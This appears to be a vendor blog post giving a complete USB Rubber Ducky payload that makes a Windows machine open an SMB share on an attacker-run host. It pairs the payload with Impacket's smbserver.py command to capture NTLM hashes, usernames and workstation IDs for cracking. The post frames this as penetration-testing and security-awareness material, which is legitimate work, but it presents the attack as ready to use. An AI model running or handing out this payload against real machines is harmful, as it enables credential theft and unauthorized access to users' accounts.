What's the quickest way to steal a Windows password hash?

Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.

This technique works against almost all versions of Microsoft Windows and only requires a 5 line Ducky Script and an open source server setup on the target network.

Killer Effort:Reward Ratio

This is actually one of my favorite USB Rubber Ducky payloads for policy compliance and information security awareness. It leverages built in functionality of the Microsoft Windows operating system, requires next to nothing in terms of privileges, and executes faster than a user could reasonably thwart the attack by unplugging the seemingly benign "USB Thumbdrive". 

The intel gained from this extremely quick attack is also of great value to any penetration tester or internal red team. Timestamp, workstation ID, user and even NTLM hash. What's not to love?

What you'll need

The Ducky Script

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

That's literally it. Just replace hostname with the hostname or IP address of your listening server running Impacket's smbserver.py

The Server

This USB Rubber Ducky payload attempts to access an SMB share on the network - \\hostname. When Windows attempts to open this share, part of the process is passing its NTLM network hash, along with its hostname (workstation ID) and username. Of course you'll also get the timestamp. What more could one ask for?

Rather than using an actual SMB server - we'll want to use Impacket's smbserver.py since it'll allow us to easily capture all of this information. The basic usage is to supply a share name and point it at a directly. This can be anything really - from tmp /tmp/ to "YOU'VE BROKEN COMPANY USB POLICY. IT WILL CONTACT YOU SOON" /stuff/

impacket/examples/smbserver.py tmp /tmp/

Have fun with that one.

Now of course this payload will work best when you have the listening smb server on the target LAN, as most good firewalls will prevent SMB access over the Internet. At least - they should... ;-)



Also in USB Rubber Ducky

Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky
Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky

Since the beginning of Keystroke Injection attacks using DuckyScript 1.0, conventional wisdom has been to begin payloads with a 3000 millisecond delay (DELAY 3000). Using DuckyScript 3.0 extensions, this may be reduced to as little as 25 milliseconds!
Keystroke Reflection - Side-Channel Exfiltration for the USB Rubber Ducky
Keystroke Reflection - Side-Channel Exfiltration for the USB Rubber Ducky

Keystroke reflection exploits the defacto standard keyboard-computer architecture implemented by all IBM-PC compatibles since 1984 and adopted in usb-hid to provide a side-channel exfiltration pathway that impacts nearly all personal computers from the last 4 decades.
What is the best security awareness payload for the Rubber Ducky?
What is the best security awareness payload for the Rubber Ducky?

A two second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.